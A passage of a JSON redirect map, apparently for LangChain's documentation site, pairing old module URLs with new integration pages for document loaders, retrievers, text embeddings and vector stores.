"source": "/en/latest/modules/indexes/document_loaders/examples/fauna.html",
"destination": "/docs/integrations/document_loaders/fauna"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/fauna",
"destination": "/docs/integrations/document_loaders/fauna"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/figma.html",
"destination": "/docs/integrations/document_loaders/figma"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/figma",
"destination": "/docs/integrations/document_loaders/figma"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/git.html",
"destination": "/docs/integrations/document_loaders/git"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/git",
"destination": "/docs/integrations/document_loaders/git"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/gitbook.html",
"destination": "/docs/integrations/document_loaders/gitbook"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/gitbook",
"destination": "/docs/integrations/document_loaders/gitbook"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/github.html",
"destination": "/docs/integrations/document_loaders/github"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/github",
"destination": "/docs/integrations/document_loaders/github"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/google_bigquery.html",
"destination": "/docs/integrations/document_loaders/google_bigquery"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/google_bigquery",
"destination": "/docs/integrations/document_loaders/google_bigquery"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/google_cloud_storage_directory.html",
"destination": "/docs/integrations/document_loaders/google_cloud_storage_directory"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/google_cloud_storage_directory",
"destination": "/docs/integrations/document_loaders/google_cloud_storage_directory"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/google_cloud_storage_file.html",
"destination": "/docs/integrations/document_loaders/google_cloud_storage_file"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/google_cloud_storage_file",
"destination": "/docs/integrations/document_loaders/google_cloud_storage_file"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/google_drive.html",
"destination": "/docs/integrations/document_loaders/google_drive"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/google_drive",
"destination": "/docs/integrations/document_loaders/google_drive"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/gutenberg.html",
"destination": "/docs/integrations/document_loaders/gutenberg"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/gutenberg",
"destination": "/docs/integrations/document_loaders/gutenberg"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/hacker_news.html",
"destination": "/docs/integrations/document_loaders/hacker_news"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/hacker_news",
"destination": "/docs/integrations/document_loaders/hacker_news"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/hugging_face_dataset.html",
"destination": "/docs/integrations/document_loaders/hugging_face_dataset"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/hugging_face_dataset",
"destination": "/docs/integrations/document_loaders/hugging_face_dataset"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/ifixit.html",
"destination": "/docs/integrations/document_loaders/ifixit"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/ifixit",
"destination": "/docs/integrations/document_loaders/ifixit"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/image.html",
"destination": "/docs/integrations/document_loaders/image"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/image",
"destination": "/docs/integrations/document_loaders/image"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/image_captions.html",
"destination": "/docs/integrations/document_loaders/image_captions"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/image_captions",
"destination": "/docs/integrations/document_loaders/image_captions"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/imsdb.html",
"destination": "/docs/integrations/document_loaders/imsdb"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/imsdb",
"destination": "/docs/integrations/document_loaders/imsdb"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/iugu.html",
"destination": "/docs/integrations/document_loaders/iugu"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/iugu",
"destination": "/docs/integrations/document_loaders/iugu"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/joplin.html",
"destination": "/docs/integrations/document_loaders/joplin"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/joplin",
"destination": "/docs/integrations/document_loaders/joplin"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/jupyter_notebook.html",
"destination": "/docs/integrations/document_loaders/jupyter_notebook"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/jupyter_notebook",
"destination": "/docs/integrations/document_loaders/jupyter_notebook"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/mastodon.html",
"destination": "/docs/integrations/document_loaders/mastodon"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/mastodon",
"destination": "/docs/integrations/document_loaders/mastodon"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/mediawikidump.html",
"destination": "/docs/integrations/document_loaders/mediawikidump"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/mediawikidump",
"destination": "/docs/integrations/document_loaders/mediawikidump"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_onedrive.html",
"destination": "/docs/integrations/document_loaders/microsoft_onedrive"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_onedrive",
"destination": "/docs/integrations/document_loaders/microsoft_onedrive"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_powerpoint.html",
"destination": "/docs/integrations/document_loaders/microsoft_powerpoint"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_powerpoint",
"destination": "/docs/integrations/document_loaders/microsoft_powerpoint"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/microsoft_word.html",
"destination": "/docs/integrations/document_loaders/microsoft_word"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/microsoft_word",
"destination": "/docs/integrations/document_loaders/microsoft_word"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/modern_treasury.html",
"destination": "/docs/integrations/document_loaders/modern_treasury"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/modern_treasury",
"destination": "/docs/integrations/document_loaders/modern_treasury"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/notion.html",
"destination": "/docs/integrations/document_loaders/notion"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/notion",
"destination": "/docs/integrations/document_loaders/notion"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/notiondb.html",
"destination": "/docs/integrations/document_loaders/notiondb"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/notiondb",
"destination": "/docs/integrations/document_loaders/notiondb"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/obsidian.html",
"destination": "/docs/integrations/document_loaders/obsidian"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/obsidian",
"destination": "/docs/integrations/document_loaders/obsidian"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/odt.html",
"destination": "/docs/integrations/document_loaders/odt"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/odt",
"destination": "/docs/integrations/document_loaders/odt"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/pandas_dataframe.html",
"destination": "/docs/integrations/document_loaders/pandas_dataframe"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/pandas_dataframe",
"destination": "/docs/integrations/document_loaders/pandas_dataframe"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/psychic.html",
"destination": "/docs/integrations/document_loaders/psychic"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/psychic",
"destination": "/docs/integrations/document_loaders/psychic"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/pyspark_dataframe.html",
"destination": "/docs/integrations/document_loaders/pyspark_dataframe"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/pyspark_dataframe",
"destination": "/docs/integrations/document_loaders/pyspark_dataframe"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/readthedocs_documentation.html",
"destination": "/docs/integrations/document_loaders/readthedocs_documentation"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/readthedocs_documentation",
"destination": "/docs/integrations/document_loaders/readthedocs_documentation"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/reddit.html",
"destination": "/docs/integrations/document_loaders/reddit"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/reddit",
"destination": "/docs/integrations/document_loaders/reddit"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/roam.html",
"destination": "/docs/integrations/document_loaders/roam"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/roam",
"destination": "/docs/integrations/document_loaders/roam"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/sitemap.html",
"destination": "/docs/integrations/document_loaders/sitemap"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/sitemap",
"destination": "/docs/integrations/document_loaders/sitemap"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/slack.html",
"destination": "/docs/integrations/document_loaders/slack"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/slack",
"destination": "/docs/integrations/document_loaders/slack"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/snowflake.html",
"destination": "/docs/integrations/document_loaders/snowflake"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/snowflake",
"destination": "/docs/integrations/document_loaders/snowflake"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/spreedly.html",
"destination": "/docs/integrations/document_loaders/spreedly"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/spreedly",
"destination": "/docs/integrations/document_loaders/spreedly"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/stripe.html",
"destination": "/docs/integrations/document_loaders/stripe"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/stripe",
"destination": "/docs/integrations/document_loaders/stripe"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/subtitle.html",
"destination": "/docs/integrations/document_loaders/subtitle"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/subtitle",
"destination": "/docs/integrations/document_loaders/subtitle"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/telegram.html",
"destination": "/docs/integrations/document_loaders/telegram"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/telegram",
"destination": "/docs/integrations/document_loaders/telegram"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/tomarkdown.html",
"destination": "/docs/integrations/document_loaders/tomarkdown"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/tomarkdown",
"destination": "/docs/integrations/document_loaders/tomarkdown"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/toml.html",
"destination": "/docs/integrations/document_loaders/toml"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/toml",
"destination": "/docs/integrations/document_loaders/toml"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/trello.html",
"destination": "/docs/integrations/document_loaders/trello"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/trello",
"destination": "/docs/integrations/document_loaders/trello"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/twitter.html",
"destination": "/docs/integrations/document_loaders/twitter"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/twitter",
"destination": "/docs/integrations/document_loaders/twitter"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/unstructured_file.html",
"destination": "/docs/integrations/document_loaders/unstructured_file"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/unstructured_file",
"destination": "/docs/integrations/document_loaders/unstructured_file"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/url.html",
"destination": "/docs/integrations/document_loaders/url"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/url",
"destination": "/docs/integrations/document_loaders/url"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/weather.html",
"destination": "/docs/integrations/document_loaders/weather"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/weather",
"destination": "/docs/integrations/document_loaders/weather"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/web_base.html",
"destination": "/docs/integrations/document_loaders/web_base"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/web_base",
"destination": "/docs/integrations/document_loaders/web_base"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/whatsapp_chat.html",
"destination": "/docs/integrations/document_loaders/whatsapp_chat"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/whatsapp_chat",
"destination": "/docs/integrations/document_loaders/whatsapp_chat"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/wikipedia.html",
"destination": "/docs/integrations/document_loaders/wikipedia"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/wikipedia",
"destination": "/docs/integrations/document_loaders/wikipedia"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/xml.html",
"destination": "/docs/integrations/document_loaders/xml"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/xml",
"destination": "/docs/integrations/document_loaders/xml"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/youtube_audio.html",
"destination": "/docs/integrations/document_loaders/youtube_audio"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/youtube_audio",
"destination": "/docs/integrations/document_loaders/youtube_audio"
},
{
"source": "/en/latest/modules/indexes/document_loaders/examples/youtube_transcript.html",
"destination": "/docs/integrations/document_loaders/youtube_transcript"
},
{
"source": "/docs/modules/data_connection/document_loaders/integrations/youtube_transcript",
"destination": "/docs/integrations/document_loaders/youtube_transcript"
},
{
"source": "/en/latest/modules/indexes/text_splitters/examples/markdown_header_metadata.html",
"destination": "/docs/modules/data_connection/document_transformers/text_splitters/markdown_header_metadata"
},
{
"source": "/en/latest/modules/indexes/text_splitters.html",
"destination": "/docs/modules/data_connection/document_transformers/"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/chroma_self_query.html",
"destination": "/docs/modules/data_connection/retrievers/how_to/self_query/chroma_self_query"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/self_query.html",
"destination": "/docs/modules/data_connection/retrievers/how_to/self_query/pinecone"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/qdrant_self_query.html",
"destination": "/docs/modules/data_connection/retrievers/how_to/self_query/qdrant_self_query"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/weaviate_self_query.html",
"destination": "/docs/modules/data_connection/retrievers/how_to/self_query/weaviate_self_query"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/arxiv.html",
"destination": "/docs/integrations/retrievers/arxiv"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/arxiv",
"destination": "/docs/integrations/retrievers/arxiv"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/azure_cognitive_search.html",
"destination": "/docs/integrations/retrievers/azure_cognitive_search"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/azure_cognitive_search",
"destination": "/docs/integrations/retrievers/azure_cognitive_search"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/chatgpt-plugin.html",
"destination": "/docs/integrations/retrievers/chatgpt-plugin"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/chatgpt-plugin",
"destination": "/docs/integrations/retrievers/chatgpt-plugin"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/cohere-reranker.html",
"destination": "/docs/integrations/retrievers/cohere-reranker"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/cohere-reranker",
"destination": "/docs/integrations/retrievers/cohere-reranker"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/databerry.html",
"destination": "/docs/integrations/retrievers/chaindesk"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/chaindesk",
"destination": "/docs/integrations/retrievers/chaindesk"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/databerry",
"destination": "/docs/integrations/retrievers/chaindesk"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/chaindesk",
"destination": "/docs/integrations/retrievers/chaindesk"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/elastic_search_bm25.html",
"destination": "/docs/integrations/retrievers/elastic_search_bm25"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/elastic_search_bm25",
"destination": "/docs/integrations/retrievers/elastic_search_bm25"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/knn.html",
"destination": "/docs/integrations/retrievers/knn"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/knn",
"destination": "/docs/integrations/retrievers/knn"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/merger_retriever.html",
"destination": "/docs/integrations/retrievers/merger_retriever"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/merger_retriever",
"destination": "/docs/integrations/retrievers/merger_retriever"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/metal.html",
"destination": "/docs/integrations/retrievers/metal"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/metal",
"destination": "/docs/integrations/retrievers/metal"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/pinecone_hybrid_search.html",
"destination": "/docs/integrations/retrievers/pinecone_hybrid_search"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/pinecone_hybrid_search",
"destination": "/docs/integrations/retrievers/pinecone_hybrid_search"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/pubmed.html",
"destination": "/docs/integrations/retrievers/pubmed"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/pubmed",
"destination": "/docs/integrations/retrievers/pubmed"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/svm.html",
"destination": "/docs/integrations/retrievers/svm"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/svm",
"destination": "/docs/integrations/retrievers/svm"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/tf_idf.html",
"destination": "/docs/integrations/retrievers/tf_idf"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/tf_idf",
"destination": "/docs/integrations/retrievers/tf_idf"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/vespa.html",
"destination": "/docs/integrations/retrievers/vespa"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/vespa",
"destination": "/docs/integrations/retrievers/vespa"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/weaviate-hybrid.html",
"destination": "/docs/integrations/retrievers/weaviate-hybrid"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/weaviate-hybrid",
"destination": "/docs/integrations/retrievers/weaviate-hybrid"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/wikipedia.html",
"destination": "/docs/integrations/retrievers/wikipedia"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/wikipedia",
"destination": "/docs/integrations/retrievers/wikipedia"
},
{
"source": "/en/latest/modules/indexes/retrievers/examples/zep_memorystore.html",
"destination": "/docs/integrations/retrievers/zep_memorystore"
},
{
"source": "/docs/modules/data_connection/retrievers/integrations/zep_memorystore",
"destination": "/docs/integrations/retrievers/zep_memorystore"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/aleph_alpha.html",
"destination": "/docs/integrations/text_embedding/aleph_alpha"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/aleph_alpha",
"destination": "/docs/integrations/text_embedding/aleph_alpha"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/azureopenai.html",
"destination": "/docs/integrations/text_embedding/azureopenai"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/azureopenai",
"destination": "/docs/integrations/text_embedding/azureopenai"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/amazon_bedrock.html",
"destination": "/docs/integrations/text_embedding/bedrock"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/bedrock",
"destination": "/docs/integrations/text_embedding/bedrock"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/cohere.html",
"destination": "/docs/integrations/text_embedding/cohere"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/cohere",
"destination": "/docs/integrations/text_embedding/cohere"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/dashscope.html",
"destination": "/docs/integrations/text_embedding/dashscope"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/dashscope",
"destination": "/docs/integrations/text_embedding/dashscope"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/deepinfra.html",
"destination": "/docs/integrations/text_embedding/deepinfra"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/deepinfra",
"destination": "/docs/integrations/text_embedding/deepinfra"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/elasticsearch.html",
"destination": "/docs/integrations/text_embedding/elasticsearch"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/elasticsearch",
"destination": "/docs/integrations/text_embedding/elasticsearch"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/embaas.html",
"destination": "/docs/integrations/text_embedding/embaas"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/embaas",
"destination": "/docs/integrations/text_embedding/embaas"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/fake.html",
"destination": "/docs/integrations/text_embedding/fake"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/fake",
"destination": "/docs/integrations/text_embedding/fake"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/google_vertex_ai_palm.html",
"destination": "/docs/integrations/text_embedding/google_vertex_ai_palm"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/google_vertex_ai_palm",
"destination": "/docs/integrations/text_embedding/google_vertex_ai_palm"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/huggingface_hub.html",
"destination": "/docs/integrations/text_embedding/huggingfacehub"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/huggingfacehub",
"destination": "/docs/integrations/text_embedding/huggingfacehub"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/huggingface_instruct.html",
"destination": "/docs/integrations/text_embedding/instruct_embeddings"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/instruct_embeddings",
"destination": "/docs/integrations/text_embedding/instruct_embeddings"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/jina.html",
"destination": "/docs/integrations/text_embedding/jina"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/jina",
"destination": "/docs/integrations/text_embedding/jina"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/llamacpp.html",
"destination": "/docs/integrations/text_embedding/llamacpp"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/llamacpp",
"destination": "/docs/integrations/text_embedding/llamacpp"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/minimax.html",
"destination": "/docs/integrations/text_embedding/minimax"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/minimax",
"destination": "/docs/integrations/text_embedding/minimax"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/modelscope_hub.html",
"destination": "/docs/integrations/text_embedding/modelscope_hub"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/modelscope_hub",
"destination": "/docs/integrations/text_embedding/modelscope_hub"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/mosaicml.html",
"destination": "/docs/integrations/text_embedding/mosaicml"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/mosaicml",
"destination": "/docs/integrations/text_embedding/mosaicml"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/openai.html",
"destination": "/docs/integrations/text_embedding/openai"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/openai",
"destination": "/docs/integrations/text_embedding/openai"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/sagemaker-endpoint.html",
"destination": "/docs/integrations/text_embedding/sagemaker-endpoint"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/sagemaker-endpoint",
"destination": "/docs/integrations/text_embedding/sagemaker-endpoint"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/self-hosted.html",
"destination": "/docs/integrations/text_embedding/self-hosted"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/self-hosted",
"destination": "/docs/integrations/text_embedding/self-hosted"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/sentence_transformers.html",
"destination": "/docs/integrations/text_embedding/sentence_transformers"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/sentence_transformers",
"destination": "/docs/integrations/text_embedding/sentence_transformers"
},
{
"source": "/en/latest/modules/models/text_embedding/examples/tensorflowhub.html",
"destination": "/docs/integrations/text_embedding/tensorflowhub"
},
{
"source": "/docs/modules/data_connection/text_embedding/integrations/tensorflowhub",
"destination": "/docs/integrations/text_embedding/tensorflowhub"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/analyticdb.html",
"destination": "/docs/integrations/vectorstores/analyticdb"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/analyticdb",
"destination": "/docs/integrations/vectorstores/analyticdb"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/annoy.html",
"destination": "/docs/integrations/vectorstores/annoy"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/annoy",
"destination": "/docs/integrations/vectorstores/annoy"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/atlas.html",
"destination": "/docs/integrations/vectorstores/atlas"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/atlas",
"destination": "/docs/integrations/vectorstores/atlas"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/awadb.html",
"destination": "/docs/integrations/vectorstores/awadb"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/awadb",
"destination": "/docs/integrations/vectorstores/awadb"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/azuresearch.html",
"destination": "/docs/integrations/vectorstores/azuresearch"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/azuresearch",
"destination": "/docs/integrations/vectorstores/azuresearch"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/chroma.html",
"destination": "/docs/integrations/vectorstores/chroma"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/chroma",
"destination": "/docs/integrations/vectorstores/chroma"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/deeplake.html",
"destination": "/docs/integrations/vectorstores/deeplake"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/deeplake",
"destination": "/docs/integrations/vectorstores/deeplake"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/docarray_hnsw.html",
"destination": "/docs/integrations/vectorstores/docarray_hnsw"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/docarray_hnsw",
"destination": "/docs/integrations/vectorstores/docarray_hnsw"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/docarray_in_memory.html",
"destination": "/docs/integrations/vectorstores/docarray_in_memory"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/docarray_in_memory",
"destination": "/docs/integrations/vectorstores/docarray_in_memory"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/faiss.html",
"destination": "/docs/integrations/vectorstores/faiss"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/faiss",
"destination": "/docs/integrations/vectorstores/faiss"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/hologres.html",
"destination": "/docs/integrations/vectorstores/hologres"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/hologres",
"destination": "/docs/integrations/vectorstores/hologres"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/lancedb.html",
"destination": "/docs/integrations/vectorstores/lancedb"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/lancedb",
"destination": "/docs/integrations/vectorstores/lancedb"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/matchingengine.html",
"destination": "/docs/integrations/vectorstores/matchingengine"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/matchingengine",
"destination": "/docs/integrations/vectorstores/matchingengine"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/milvus.html",
"destination": "/docs/integrations/vectorstores/milvus"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/milvus",
"destination": "/docs/integrations/vectorstores/milvus"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/mongodb_atlas_vector_search.html",
"destination": "/docs/integrations/vectorstores/mongodb_atlas_vector_search"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/mongodb_atlas_vector_search",
"destination": "/docs/integrations/vectorstores/mongodb_atlas_vector_search"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/myscale.html",
"destination": "/docs/integrations/vectorstores/myscale"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/myscale",
"destination": "/docs/integrations/vectorstores/myscale"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/opensearch.html",
"destination": "/docs/integrations/vectorstores/opensearch"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/opensearch",
"destination": "/docs/integrations/vectorstores/opensearch"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/pgvector.html",
"destination": "/docs/integrations/vectorstores/pgvector"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/pgvector",
"destination": "/docs/integrations/vectorstores/pgvector"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/pinecone.html",
"destination": "/docs/integrations/vectorstores/pinecone"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/pinecone",
"destination": "/docs/integrations/vectorstores/pinecone"
},
{
"source": "/en/latest/modules/indexes/vectorstores/examples/qdrant.html",
"destination": "/docs/integrations/vectorstores/qdrant"
},
{
"source": "/docs/modules/data_connection/vectorstores/integrations/qdrant",
